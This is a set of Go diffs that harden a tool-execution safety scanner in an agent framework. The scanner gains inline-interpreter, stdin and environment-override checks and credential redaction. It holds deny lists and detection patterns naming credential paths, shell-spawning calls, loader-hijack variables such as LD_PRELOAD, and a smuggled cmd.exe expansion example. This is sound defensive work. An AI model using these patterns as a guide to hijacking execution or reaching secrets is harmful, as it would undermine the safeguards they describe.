 	} else if req.InteractiveWrite {
@@ -600,6 +667,9 @@ func (s scanner) scanShell(req Request, command string) []Finding {
 		)}
 	}
 	findings = append(findings, s.scanRawCommand(req, command)...)
+	if s.canceled() {
+		return findings
+	}
 	pipe, err := shellsafe.Parse(command)
 	if err != nil {
 		decision := DecisionAsk
@@ -675,6 +745,9 @@ func hasWindowsCmdSyntax(command string) bool {
 func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 	var findings []Finding
 	for _, argv := range pipe.Commands {
+		if s.canceled() {
+			return findings
+		}
 		if len(argv) == 0 {
 			continue
 		}
@@ -690,6 +763,9 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 		}
 		chain := commandChain(argv)
 		for i, effective := range chain {
+			if s.canceled() {
+				return findings
+			}
 			effectiveName := commandName(effective[0])
 			findings = append(findings, s.scanDeniedCommand(effectiveName)...)
 			if i == len(chain)-1 && shellsafe.IsImplicitlyDenied(effectiveName) {
@@ -737,9 +813,85 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 				"Pass the effective command directly or use an audited workspace script.",
 			))
 		}
+		findings = append(findings, s.scanInlineInterpreter(last)...)
 		findings = append(findings, s.scanDeniedPaths(argv)...)
 	}
 	return findings
+}
+
+// scanInlineInterpreter routes source passed through an interpreter switch such
+// as python -c or node -e through the code-block checks. Without this the
+// payload stays an ordinary argument, so a denied path, a non-allowlisted host,
+// or a shell bridge inside it is never inspected.
+func (s scanner) scanInlineInterpreter(argv []string) []Finding {
+	language, code, ok := inlineInterpreterPayload(argv)
+	if !ok {
+		return nil
+	}
+	if strings.TrimSpace(code) == "" {
+		return nil
+	}
+	return s.scanCodeBlock(
+		Request{ToolName: "inline_code", Backend: BackendCodeExec},
+		CodeBlock{Language: language, Code: code},
+	)
+}
+
+// inlineInterpreterPayload returns the language and source carried by an
+// interpreter switch. It accepts both a separate payload argument and the
+// interpreter's attached short or long-option form.
+func inlineInterpreterPayload(argv []string) (string, string, bool) {
+	if len(argv) < 2 {
+		return "", "", false
+	}
+	language, switches, ok := inlineInterpreterSwitches(commandName(argv[0]))
+	if !ok {
+		return "", "", false
+	}
+	for i := 1; i < len(argv); i++ {
+		for _, option := range switches {
+			if argv[i] == option {
+				if i+1 < len(argv) {
+					return language, argv[i+1], true
+				}
+				return "", "", false
+			}
+			if code, ok := attachedOptionValue(argv[i], option); ok {
+				return language, code, true
+			}
+		}
+	}
+	return "", "", false
+}
+
+func attachedOptionValue(arg, option string) (string, bool) {
+	if strings.HasPrefix(option, "--") {
+		value, ok := strings.CutPrefix(arg, option+"=")
+		return value, ok && value != ""
+	}
+	value, ok := strings.CutPrefix(arg, option)
+	return value, ok && value != ""
+}
+
+// inlineInterpreterSwitches maps an interpreter to the options that introduce
+// inline source and to the language its payload should be scanned as.
+func inlineInterpreterSwitches(name string) (string, []string, bool) {
+	switch {
+	case name == "python" || name == "python2" || name == "python3" ||
+		name == "py" || name == "pypy" || name == "pypy3" ||
+		strings.HasPrefix(name, "python2.") || strings.HasPrefix(name, "python3."):
+		return "python", []string{"-c"}, true
+	case name == "node" || name == "nodejs":
+		return "javascript", []string{"-e", "--eval", "-p", "--print"}, true
+	case name == "ruby":
+		return "ruby", []string{"-e"}, true
+	case name == "perl":
+		return "perl", []string{"-e", "-E"}, true
+	case name == "php":
+		return "php", []string{"-r"}, true
+	default:
+		return "", nil, false
+	}
 }
 
 func (s scanner) scanDeniedCommand(name string) []Finding {
@@ -863,6 +1015,9 @@ func (s scanner) scanReviewCommand(argv []string) []Finding {
 func (s scanner) scanDeniedPaths(argv []string) []Finding {
 	var findings []Finding
 	for _, arg := range argv[1:] {
+		if s.canceled() {
+			return findings
+		}
 		for _, candidate := range pathCandidates(arg) {
 			if s.pathDenied(candidate) {
 				findings = append(findings, newFinding(
@@ -944,6 +1099,9 @@ func (s scanner) scanNetwork(command string) []Finding {
 	unresolvedRemap := false
 	if pipe, err := shellsafe.Parse(command); err == nil {
 		for _, argv := range pipe.Commands {
+			if s.canceled() {
+				return findings
+			}
 			if containsNetworkCommand(argv) {
 				networkCommand = true
 			}
@@ -964,6 +1122,9 @@ func (s scanner) scanNetwork(command string) []Finding {
 	targets = append(targets, remapTargets...)
 	checkedHosts := make(map[string]struct{})
 	for _, raw := range targets {
+		if s.canceled() {
+			return findings
+		}
 		host := hostOf(raw)
 		if host == "" {
 			continue
@@ -1668,6 +1829,9 @@ func (s scanner) scanCodeBlock(req Request, block CodeBlock) []Finding {
 	code := strings.TrimSpace(block.Code)
 	var findings []Finding
 	findings = append(findings, s.scanSecretText(code, "code block")...)
+	if s.canceled() {
+		return findings
+	}
 	if lang == "bash" || lang == "sh" || lang == "shell" || lang == "" {
 		shellReq := req
 		shellReq.ToolName = "code_block"
@@ -1681,9 +1845,7 @@ func (s scanner) scanCodeBlock(req Request, block CodeBlock) []Finding {
 		return findings
 	}
 	lower := strings.ToLower(code)
-	if strings.Contains(lower, "os.system") ||
-		strings.Contains(lower, "subprocess.") ||
-		strings.Contains(lower, "exec(") {
+	if codeCanLaunchHostCommand(lang, lower) {
 		findings = append(findings, newFinding(
 			DecisionNeedsHumanReview,
 			RiskMedium,
@@ -1699,9 +1861,36 @@ func (s scanner) scanCodeBlock(req Request, block CodeBlock) []Finding {
 	return findings
 }
 
+func codeCanLaunchHostCommand(language, lowerCode string) bool {
+	patterns := []string{"os.system", "os.popen", "pty.spawn", "subprocess.", "exec("}
+	switch language {
+	case "javascript", "js", "typescript", "ts", "node", "nodejs":
+		patterns = append(patterns,
+			"child_process", "execsync", "spawn", "spawnsync",
+			"deno.command", "bun.spawn",
+		)
+	case "ruby":
+		patterns = append(patterns,
+			"system", "spawn", "io.popen", "open3.", "exec ", "`",
+		)
+	case "perl":
+		patterns = append(patterns, "system", "qx/", "qx(", "exec ", "`")
+	case "php":
+		patterns = append(patterns,
+			"shell_exec", "system", "passthru", "proc_open", "popen",
+		)
+	}
+	return slices.ContainsFunc(patterns, func(pattern string) bool {
+		return strings.Contains(lowerCode, pattern)
+	})
+}
+
 func (s scanner) scanCodePaths(code string) []Finding {
 	var findings []Finding
 	for _, literal := range codeStringLiterals(code) {
+		if s.canceled() {
+			return findings
+		}
 		if !s.pathDenied(literal) {
 			continue
 		}
@@ -1734,6 +1923,9 @@ func (s scanner) scanCodeNetwork(code string) []Finding {
 	var findings []Finding
 	checkedHosts := make(map[string]struct{})
 	for _, match := range codeNetworkCallRE.FindAllStringSubmatch(code, -1) {
+		if s.canceled() {
+			return findings
+		}
 		if len(match) != 2 || strings.Contains(match[1], "://") {
 			continue
 		}
@@ -2021,6 +2213,34 @@ var (
 	// optional so that a bare credential is still recognized.
 	authorizationHeaderRE = regexp.MustCompile(
 		`(?i)((?:proxy-)?authorization\s*:\s*)((?:bearer|basic|digest|token|apikey)\s+)?([^\s'"\\]+)`)
+	// urlUserInfoRE matches the password half of a URL userinfo component, as
+	// in https://alice:hunter2@host. The username is kept so the report still
+	// identifies the principal.
+	urlUserInfoRE = regexp.MustCompile(
+		`(?i)([a-z][a-z0-9+.-]*://)([^:/?#\s@"']*:)([^@/?#\s"']+)@`)
+	// curlUserCredentialREs match long credential options. The three forms keep
+	// quoted passwords containing spaces from being only partially redacted.
+	curlUserCredentialREs = []*regexp.Regexp{
+		regexp.MustCompile(
+			`(?i)(--(?:user|proxy-user)(?:[ \t]+|=)[ \t]*")([^":]*:)([^"]+)(")`),
+		regexp.MustCompile(
+			`(?i)(--(?:user|proxy-user)(?:[ \t]+|=)[ \t]*')([^':]*:)([^']+)(')`),
+		regexp.MustCompile(
+			`(?i)(--(?:user|proxy-user)(?:[ \t]+|=)[ \t]*)([^: \t\n\r;&|"'=]*:)([^ \t\n\r;&|"']+)()`),
+	}
+	// curlCommandRE reports whether text invokes curl, limiting the ambiguous
+	// short -u option without depending on its position relative to quoted shell
+	// metacharacters.
+	curlCommandRE = regexp.MustCompile(
+		`(?i)(?:^|[;&|]\s*)["']?(?:(?:[a-z]:)?[^\s"';&|]*[/\\])?curl(?:\.exe|\.cmd|\.bat|\.com)?["']?(?:\s|$)`)
+	curlShortUserCredentialREs = []*regexp.Regexp{
+		regexp.MustCompile(
+			`(?i)([ \t]-u[ \t]*")([^":]*:)([^"]+)(")`),
+		regexp.MustCompile(
+			`(?i)([ \t]-u[ \t]*')([^':]*:)([^']+)(')`),
+		regexp.MustCompile(
+			`(?i)([ \t]-u[ \t]*)([^: \t\n\r;&|"'=]*:)([^ \t\n\r;&|"']+)()`),
+	}
 	codeStringLiteralRE = regexp.MustCompile(
 		`(?s)(?:"((?:\\.|[^"\\])*)"|'((?:\\.|[^'\\])*)')`)
 	// codeNetworkCallRE matches direct and chained socket connects. The
@@ -2043,7 +2263,23 @@ func looksSensitive(text string) bool {
 	return secretValueRE.MatchString(text) ||
 		secretSplitValueRE.MatchString(text) ||
 		authorizationHeaderRE.MatchString(text) ||
+		urlUserInfoRE.MatchString(text) ||
+		hasUserCredentialOption(text) ||
 		(secretNameRE.MatchString(text) && strings.Contains(text, "="))
+}
+
+// hasUserCredentialOption reports whether text carries a user:password value in
+// a curl-style credential option.
+func hasUserCredentialOption(text string) bool {
+	if slices.ContainsFunc(curlUserCredentialREs, func(re *regexp.Regexp) bool {
+		return re.MatchString(text)
+	}) {
+		return true
+	}
+	return curlCommandRE.MatchString(text) && slices.ContainsFunc(
+		curlShortUserCredentialREs,
+		func(re *regexp.Regexp) bool { return re.MatchString(text) },
+	)
 }
 
 type redactor struct {
@@ -2055,6 +2291,17 @@ func newRedactor() *redactor { return &redactor{} }
 func (r *redactor) redact(s string) string {
 	orig := s
 	s = authorizationHeaderRE.ReplaceAllString(s, "${1}${2}[REDACTED_SECRET]")
+	s = urlUserInfoRE.ReplaceAllString(s, "${1}${2}[REDACTED_SECRET]@")
+	for _, re := range curlUserCredentialREs {
+		s = re.ReplaceAllString(s, "${1}${2}[REDACTED_SECRET]${4}")
+	}
+	if curlCommandRE.MatchString(s) {
+		for _, re := range curlShortUserCredentialREs {
+			s = re.ReplaceAllString(
+				s, "${1}${2}[REDACTED_SECRET]${4}",
+			)
+		}
+	}
 	s = secretValueRE.ReplaceAllString(s, "[REDACTED_SECRET]")
 	s = secretNameValueRE.ReplaceAllString(s, "$1=[REDACTED_SECRET]")
 	s = secretSplitValueRE.ReplaceAllString(s, "$1$2[REDACTED_SECRET]")

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -29,6 +29,7 @@ import (
 	"gopkg.in/yaml.v3"
 
 	"trpc.group/trpc-go/trpc-agent-go/internal/shellsafe"
+	"trpc.group/trpc-go/trpc-agent-go/tool"
 	"trpc.group/trpc-go/trpc-agent-go/tool/hostexec"
 	"trpc.group/trpc-go/trpc-agent-go/tool/workspaceexec"
 )
@@ -224,15 +225,11 @@ func (p Policy) withDefaults() Policy {
 	return p
 }
 
-// ToolMetadata captures the execution-relevant metadata used by the guard.
-type ToolMetadata struct {
-	ReadOnly        bool `json:"read_only,omitempty"`
-	Destructive     bool `json:"destructive,omitempty"`
-	ConcurrencySafe bool `json:"concurrency_safe,omitempty"`
-	SearchOrRead    bool `json:"search_or_read,omitempty"`
-	OpenWorld       bool `json:"open_world,omitempty"`
-	MaxResultSize   int  `json:"max_result_size,omitempty"`
-}
+// ToolMetadata is the framework tool metadata contract, reused so that guard
+// scans and extension parsers share a single data model with the rest of the
+// framework. Metadata fields added to tool.ToolMetadata reach a scan without a
+// parallel type to update.
+type ToolMetadata = tool.ToolMetadata
 
 // CodeBlock is a script block supplied to a code execution tool.
 type CodeBlock struct {
@@ -242,14 +239,20 @@ type CodeBlock struct {
 
 // Request describes one pending tool execution.
 type Request struct {
-	ToolName       string            `json:"tool_name,omitempty"`
-	Command        string            `json:"command,omitempty"`
-	Args           []string          `json:"args,omitempty"`
-	Cwd            string            `json:"cwd,omitempty"`
-	Env            map[string]string `json:"env,omitempty"`
-	Metadata       ToolMetadata      `json:"metadata,omitempty"`
-	Backend        string            `json:"backend,omitempty"`
-	TimeoutSeconds int               `json:"timeout_seconds,omitempty"`
+	ToolName string            `json:"tool_name,omitempty"`
+	Command  string            `json:"command,omitempty"`
+	Args     []string          `json:"args,omitempty"`
+	Cwd      string            `json:"cwd,omitempty"`
+	Env      map[string]string `json:"env,omitempty"`
+	// Stdin is the initial standard input the executor forwards to the spawned
+	// process. workspace_exec passes it verbatim to the interpreter, so a
+	// payload carried here never appears in Command.
+	Stdin string `json:"stdin,omitempty"`
+	// Metadata reuses the framework tool.ToolMetadata contract and therefore
+	// serializes with its Go field names rather than snake case.
+	Metadata       ToolMetadata `json:"metadata,omitempty"`
+	Backend        string       `json:"backend,omitempty"`
+	TimeoutSeconds int          `json:"timeout_seconds,omitempty"`
 	// MaxOutputBytes is a caller-declared execution cap. A scan validates the
 	// value but does not truncate executor output itself.
 	MaxOutputBytes   int64       `json:"max_output_bytes,omitempty"`
@@ -340,17 +343,31 @@ func WriteAuditJSONL(w io.Writer, report Report) error {
 	return nil
 }
 
+// openAuditFile opens the audit sink. It is a package-level seam so tests can
+// exercise a successful write followed by a failing close.
+var openAuditFile = func(path string) (io.WriteCloser, error) {
+	return os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0o600)
+}
+
 // AppendAuditFile appends one report event to a JSONL audit file.
+//
+// The file is always closed. A close error is reported when the write itself
+// succeeded, because filesystems can surface a delayed write failure only at
+// close and the caller must not treat that event as committed.
 func AppendAuditFile(path string, report Report) error {
 	if strings.TrimSpace(path) == "" {
 		return nil
 	}
-	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0o600)
+	f, err := openAuditFile(path)
 	if err != nil {
 		return err
 	}
-	defer f.Close()
-	return WriteAuditJSONL(f, report)
+	writeErr := WriteAuditJSONL(f, report)
+	closeErr := f.Close()
+	if writeErr != nil {
+		return writeErr
+	}
+	return closeErr
 }
 
 // Scan evaluates a pending tool execution against the policy.
@@ -374,6 +391,7 @@ func (s scanner) scan(req Request) Report {
 	findings = append(findings, s.scanMetadata(req)...)
 	findings = append(findings, s.scanEnv(req.Env)...)
 	findings = append(findings, s.scanRequestEnvelope(req)...)
+	findings = append(findings, s.scanStdin(req)...)
 	if len(req.CodeBlocks) > 0 {
 		for _, block := range req.CodeBlocks {
 			findings = append(findings, s.scanCodeBlock(req, block)...)
@@ -1468,7 +1486,14 @@ func (s scanner) scanMetadata(req Request) []Finding {
 
 func (s scanner) scanEnv(env map[string]string) []Finding {
 	var findings []Finding
-	for k, v := range env {
+	// Iterate in key order so a report lists findings deterministically.
+	keys := make([]string, 0, len(env))
+	for k := range env {
+		keys = append(keys, k)
+	}
+	slices.Sort(keys)
+	for _, k := range keys {
+		v := env[k]
 		if len(s.policy.EnvAllowlist) > 0 && !s.envAllowed(k) {
 			findings = append(findings, newFinding(
 				DecisionNeedsHumanReview,
@@ -1479,7 +1504,138 @@ func (s scanner) scanEnv(env map[string]string) []Finding {
 					"update the policy after review.",
 			))
 		}
+		findings = append(findings, s.scanExecutionEnv(k, v)...)
 		findings = append(findings, s.scanSecretText(k+"="+v, "environment")...)
+	}
+	return findings
+}
+
+// scanExecutionEnv flags overrides of variables that decide which executable
+// runs or which startup files a login shell sources. Both execution paths hand
+// request environment values to a shell, and workspace_exec only enables its
+// clean-environment hardening when its separate command policy is configured,
+// so an allowlist entry keyed on the variable name alone is not sufficient.
+func (s scanner) scanExecutionEnv(key, value string) []Finding {
+	if !isExecutionResolvingEnvVar(key) {
+		return nil
+	}
+	if untrustedExecutionEnvValue(value) {
+		return []Finding{newFinding(
+			DecisionDeny,
+			RiskCritical,
+			"environment.execution_resolution_override",
+			[]string{fmt.Sprintf(
+				"environment variable %q redirects executable or shell startup "+
+					"resolution to a relative or empty location", key)},
+			"Do not point PATH, HOME, or loader variables at relative or "+
+				"writable locations; rely on the executor's clean environment.",
+		)}
+	}
+	return []Finding{newFinding(
+		DecisionNeedsHumanReview,
+		RiskHigh,
+		"environment.execution_resolution_override",
+		[]string{fmt.Sprintf(
+			"environment variable %q changes executable or shell startup "+
+				"resolution", key)},
+		"Review overrides of PATH, HOME, and loader variables, or rely on the "+
+			"executor's clean environment instead.",
+	)}
+}
+
+func isExecutionResolvingEnvVar(key string) bool {
+	_, ok := executionResolvingEnvVars[strings.ToUpper(strings.TrimSpace(key))]
+	return ok
+}
+
+// untrustedExecutionEnvValue reports whether an execution-resolving value
+// leaves resolution up to the working directory. An empty value makes a shell
+// fall back to its own defaults, and a relative entry resolves against the
+// process CWD, which the request also controls.
+func untrustedExecutionEnvValue(value string) bool {
+	if strings.TrimSpace(value) == "" {
+		return true
+	}
+	for _, entry := range splitEnvPathList(strings.TrimSpace(value)) {
+		if isRelativePathEntry(entry) {
+			return true
+		}
+	}
+	return false
+}
+
+func splitEnvPathList(value string) []string {
+	if strings.ContainsRune(value, ';') {
+		return strings.Split(value, ";")
+	}
+	if strings.ContainsRune(value, ':') && !windowsDrivePathRE.MatchString(value) {
+		return strings.Split(value, ":")
+	}
+	return []string{value}
+}
+
+func isRelativePathEntry(entry string) bool {
+	e := strings.ReplaceAll(strings.TrimSpace(strings.Trim(entry, `"'`)), "\\", "/")
+	if e == "" {
+		return true
+	}
+	if strings.HasPrefix(e, "/") || windowsDrivePathRE.MatchString(e) {
+		// Absolute POSIX, UNC, and drive-qualified paths resolve independently
+		// of the working directory.
+		return strings.Contains(e, "/./") || strings.Contains(e, "/../") ||
+			strings.HasSuffix(e, "/.") || strings.HasSuffix(e, "/..")
+	}
+	return true
+}
+
+// scanStdin inspects the initial standard input forwarded to the process.
+// The payload never reaches Command, so without this the scan only sees a
+// harmless-looking interpreter name.
+func (s scanner) scanStdin(req Request) []Finding {
+	stdin := strings.TrimSpace(req.Stdin)
+	if stdin == "" {
+		return nil
+	}
+	findings := []Finding{newFinding(
+		DecisionNeedsHumanReview,
+		RiskHigh,
+		"process.initial_stdin",
+		[]string{"initial stdin is forwarded unparsed to the spawned process"},
+		"Review initial standard input before execution, or move the payload "+
+			"into an audited workspace file that the command reads by path.",
+	)}
+	findings = append(findings, s.scanSecretText(stdin, "initial stdin")...)
+	findings = append(findings, s.scanTextPaths(stdin, "initial stdin")...)
+	findings = append(findings, s.scanNetwork(stdin)...)
+	findings = append(findings, s.scanCodeNetwork(stdin)...)
+	return findings
+}
+
+// scanTextPaths checks denied paths in free-form text whose interpreter is not
+// known, covering both quoted literals and whitespace-separated tokens.
+func (s scanner) scanTextPaths(text, source string) []Finding {
+	var findings []Finding
+	seen := make(map[string]struct{})
+	candidates := codeStringLiterals(text)
+	candidates = append(candidates, strings.Fields(text)...)
+	for _, candidate := range candidates {
+		for _, path := range pathCandidates(candidate) {
+			if _, ok := seen[path]; ok {
+				continue
+			}
+			seen[path] = struct{}{}
+			if !s.pathDenied(path) {
+				continue
+			}
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskCritical,
+				"sensitive.path_access",
+				[]string{fmt.Sprintf("%s references denied path %q", source, path)},
+				"Do not access system paths, SSH material, credentials, or "+
+					"secrets from tool execution.",
+			))
+		}
 	}
 	return findings
 }
@@ -1816,6 +1972,17 @@ func newFinding(
 }
 
 var (
+	// executionResolvingEnvVars decide which executable a command resolves to
+	// or which startup files an interpreter or login shell sources. Overriding
+	// one redirects an otherwise safe command, so allowlisting them by name is
+	// not enough.
+	executionResolvingEnvVars = map[string]struct{}{
+		"PATH": {}, "HOME": {}, "SHELL": {}, "IFS": {}, "ZDOTDIR": {},
+		"BASH_ENV": {}, "ENV": {}, "LD_PRELOAD": {}, "LD_LIBRARY_PATH": {},
+		"LD_AUDIT": {}, "DYLD_INSERT_LIBRARIES": {}, "DYLD_LIBRARY_PATH": {},
+		"PYTHONPATH": {}, "PYTHONSTARTUP": {}, "NODE_OPTIONS": {},
+		"PERL5LIB": {}, "RUBYOPT": {}, "GIT_SSH_COMMAND": {},
+	}
 	unresolvedReexecWrappers = map[string]struct{}{
 		"sh": {}, "bash": {}, "zsh": {}, "ash": {}, "dash": {},
 		"ksh": {}, "mksh": {}, "fish": {}, "pwsh": {}, "powershell": {},
@@ -1849,16 +2016,33 @@ var (
 		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)=([^ \t\n\r;&|]+)`)
 	secretSplitValueRE = regexp.MustCompile(
 		`(?i)(--?(?:api[_-]?key|token|password|passwd|secret|private[_-]?key|credential))([ \t]+)([^ \t\n\r;&|]+)`)
+	// authorizationHeaderRE matches Authorization and Proxy-Authorization
+	// header values in either header syntax or CLI flag form. The scheme is
+	// optional so that a bare credential is still recognized.
+	authorizationHeaderRE = regexp.MustCompile(
+		`(?i)((?:proxy-)?authorization\s*:\s*)((?:bearer|basic|digest|token|apikey)\s+)?([^\s'"\\]+)`)
 	codeStringLiteralRE = regexp.MustCompile(
 		`(?s)(?:"((?:\\.|[^"\\])*)"|'((?:\\.|[^'\\])*)')`)
+	// codeNetworkCallRE matches direct and chained socket connects. The
+	// receiver form allows constructor arguments so that
+	// socket.socket(AF_INET, SOCK_STREAM).connect(...) is inspected too.
 	codeNetworkCallRE = regexp.MustCompile(
-		`(?i)\b(?:socket\.(?:create_connection|getaddrinfo)|socket\.socket\s*\(\s*\)\s*\.connect|[a-z_][a-z0-9_]*\.connect|http\.client\.(?:http|https)connection)\s*\(\s*\(?\s*["']([^"']+)["']`)
-	windowsCmdExpansionRE = regexp.MustCompile(`%[A-Za-z_][A-Za-z0-9_]*%`)
+		`(?i)\b(?:socket\.(?:create_connection|getaddrinfo)|socket\.socket\s*\([^()]*\)\s*\.connect|[a-z_][a-z0-9_]*\.connect|http\.client\.(?:http|https)connection)\s*\(\s*\(?\s*["']([^"']+)["']`)
+	// windowsCmdExpansionRE matches cmd.exe variable expansion in every form
+	// the interpreter accepts: the plain %VAR%, the substring modifier
+	// %VAR:~start,len%, and the substitution modifier %VAR:old=new%. The
+	// modifier forms rewrite the token before execution, so
+	// %COMSPEC:cmd.exe=shutdown.exe% resolves to a different executable than
+	// the one the scan can see.
+	windowsCmdExpansionRE = regexp.MustCompile(
+		`%[A-Za-z_][A-Za-z0-9_]*(?::(?:~[+-]?\d+(?:,[+-]?\d+)?|\*?[^%=]*=[^%]*))?%`)
+	windowsDrivePathRE = regexp.MustCompile(`^(?:[A-Za-z]:[\\/]|//|\\\\)`)
 )
 
 func looksSensitive(text string) bool {
 	return secretValueRE.MatchString(text) ||
 		secretSplitValueRE.MatchString(text) ||
+		authorizationHeaderRE.MatchString(text) ||
 		(secretNameRE.MatchString(text) && strings.Contains(text, "="))
 }
 
@@ -1870,6 +2054,7 @@ func newRedactor() *redactor { return &redactor{} }
 
 func (r *redactor) redact(s string) string {
 	orig := s
+	s = authorizationHeaderRE.ReplaceAllString(s, "${1}${2}[REDACTED_SECRET]")
 	s = secretValueRE.ReplaceAllString(s, "[REDACTED_SECRET]")
 	s = secretNameValueRE.ReplaceAllString(s, "$1=[REDACTED_SECRET]")
 	s = secretSplitValueRE.ReplaceAllString(s, "$1$2[REDACTED_SECRET]")

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -30,6 +30,7 @@ import (
 
 	"trpc.group/trpc-go/trpc-agent-go/internal/shellsafe"
 	"trpc.group/trpc-go/trpc-agent-go/tool/hostexec"
+	"trpc.group/trpc-go/trpc-agent-go/tool/workspaceexec"
 )
 
 const (
@@ -95,6 +96,7 @@ func DefaultPolicy() Policy {
 		DeniedPaths: []string{
 			"/", "/bin", "/boot", "/dev", "/etc", "/lib", "/lib64",
 			"/proc", "/root", "/sbin", "/sys", "/usr", "/var",
+			"c:/windows", "c:/program files", "c:/programdata",
 			"~/.ssh", ".ssh", ".env", ".npmrc", ".pypirc",
 			"id_rsa", "id_ed25519", "credentials", "credential",
 			"secrets", "secret",
@@ -250,10 +252,11 @@ type Request struct {
 	TimeoutSeconds int               `json:"timeout_seconds,omitempty"`
 	// MaxOutputBytes is a caller-declared execution cap. A scan validates the
 	// value but does not truncate executor output itself.
-	MaxOutputBytes int64       `json:"max_output_bytes,omitempty"`
-	Background     bool        `json:"background,omitempty"`
-	TTY            bool        `json:"tty,omitempty"`
-	CodeBlocks     []CodeBlock `json:"code_blocks,omitempty"`
+	MaxOutputBytes   int64       `json:"max_output_bytes,omitempty"`
+	Background       bool        `json:"background,omitempty"`
+	TTY              bool        `json:"tty,omitempty"`
+	InteractiveWrite bool        `json:"interactive_write,omitempty"`
+	CodeBlocks       []CodeBlock `json:"code_blocks,omitempty"`
 }
 
 // Finding is one matched safety rule.
@@ -375,6 +378,8 @@ func (s scanner) scan(req Request) Report {
 		for _, block := range req.CodeBlocks {
 			findings = append(findings, s.scanCodeBlock(req, block)...)
 		}
+	} else if req.InteractiveWrite {
+		findings = append(findings, s.scanSecretText(cmd, "interactive input")...)
 	} else {
 		findings = append(findings, s.scanShell(req, cmd)...)
 	}
@@ -393,6 +398,15 @@ func (s scanner) scan(req Request) Report {
 
 func (s scanner) scanRequestEnvelope(req Request) []Finding {
 	var findings []Finding
+	if req.InteractiveWrite {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"interactive.stdin_write",
+			[]string{"interactive session input can execute deferred commands"},
+			"Review non-empty interactive input before writing it to a running session.",
+		))
+	}
 	if s.pathDenied(req.Cwd) {
 		findings = append(findings, newFinding(
 			DecisionDeny,
@@ -424,7 +438,7 @@ func (s scanner) scanRequestEnvelope(req Request) []Finding {
 		))
 	}
 	timeoutSeconds := effectiveTimeoutSeconds(req)
-	if timeoutSeconds > s.policy.MaxTimeoutSeconds {
+	if !req.InteractiveWrite && timeoutSeconds > s.policy.MaxTimeoutSeconds {
 		findings = append(findings, newFinding(
 			DecisionDeny,
 			RiskHigh,
@@ -450,6 +464,9 @@ func (s scanner) scanRequestEnvelope(req Request) []Finding {
 func effectiveTimeoutSeconds(req Request) int {
 	if req.Backend == BackendHostExec && req.TimeoutSeconds <= 0 {
 		return hostexec.DefaultTimeoutSeconds
+	}
+	if req.Backend == BackendWorkspaceExec && req.TimeoutSeconds <= 0 {
+		return workspaceexec.DefaultTimeoutSeconds
 	}
 	return req.TimeoutSeconds
 }
@@ -589,6 +606,15 @@ func (s scanner) scanRawCommand(req Request, command string) []Finding {
 	var findings []Finding
 	lower := strings.ToLower(command)
 	findings = append(findings, s.scanSecretText(command, "command")...)
+	if req.Backend == BackendHostExec && hasWindowsCmdSyntax(command) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"shell.windows_cmd_syntax",
+			[]string{"host command contains cmd.exe expansion or caret syntax"},
+			"Pass literal argv without cmd.exe variable expansion or caret escaping.",
+		))
+	}
 	if hasShellBypass(lower) {
 		findings = append(findings, newFinding(
 			DecisionDeny,
@@ -624,6 +650,10 @@ func (s scanner) scanRawCommand(req Request, command string) []Finding {
 	return findings
 }
 
+func hasWindowsCmdSyntax(command string) bool {
+	return windowsCmdExpansionRE.MatchString(command) || strings.Contains(command, "^")
+}
+
 func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 	var findings []Finding
 	for _, argv := range pipe.Commands {
@@ -641,9 +671,28 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 			))
 		}
 		chain := commandChain(argv)
-		for _, effective := range chain {
+		for i, effective := range chain {
 			effectiveName := commandName(effective[0])
 			findings = append(findings, s.scanDeniedCommand(effectiveName)...)
+			if i == len(chain)-1 && shellsafe.IsImplicitlyDenied(effectiveName) {
+				findings = append(findings, newFinding(
+					DecisionDeny,
+					RiskHigh,
+					"shell.intrinsic_unsafe_command",
+					[]string{fmt.Sprintf(
+						"command %q is an unsafe shell builtin or re-executing command", effective[0])},
+					"Use a directly inspectable command or an audited workspace script.",
+				))
+			}
+			if isEnvironmentDumpCommand(effectiveName, effective) {
+				findings = append(findings, newFinding(
+					DecisionNeedsHumanReview,
+					RiskHigh,
+					"sensitive.inherited_environment",
+					[]string{fmt.Sprintf("command %q can print inherited environment variables", effective[0])},
+					"Use an executor with a proven clean environment or review the output manually.",
+				))
+			}
 			if len(s.policy.AllowedCommands) > 0 &&
 				!s.commandAllowed(effective[0]) {
 				findings = append(findings, newFinding(
@@ -657,8 +706,7 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 			}
 			findings = append(findings,
 				s.scanDangerousCommand(effectiveName, effective)...)
-			findings = append(findings,
-				s.scanReviewCommand(strings.Join(effective, " "))...)
+			findings = append(findings, s.scanReviewCommand(effective)...)
 		}
 		last := chain[len(chain)-1]
 		if isUnresolvedReexecWrapper(commandName(last[0])) {
@@ -769,11 +817,18 @@ func isSystemPath(path string) bool {
 	})
 }
 
-func (s scanner) scanReviewCommand(command string) []Finding {
-	lower := strings.ToLower(strings.TrimSpace(command))
+func (s scanner) scanReviewCommand(argv []string) []Finding {
+	if len(argv) == 0 {
+		return nil
+	}
+	raw := strings.ToLower(strings.TrimSpace(strings.Join(argv, " ")))
+	normalized := commandName(argv[0])
+	if len(argv) > 1 {
+		normalized += " " + strings.ToLower(strings.Join(argv[1:], " "))
+	}
 	for _, review := range s.policy.ReviewCommands {
 		r := strings.ToLower(strings.TrimSpace(review))
-		if r != "" && strings.HasPrefix(lower, r) {
+		if r != "" && (strings.HasPrefix(raw, r) || strings.HasPrefix(normalized, r)) {
 			return []Finding{newFinding(
 				DecisionNeedsHumanReview,
 				RiskMedium,
@@ -1105,6 +1160,17 @@ func containsNetworkCommand(argv []string) bool {
 	return false
 }
 
+func isEnvironmentDumpCommand(name string, argv []string) bool {
+	switch name {
+	case "env":
+		return len(unwrapEnvCommand(argv)) == 0
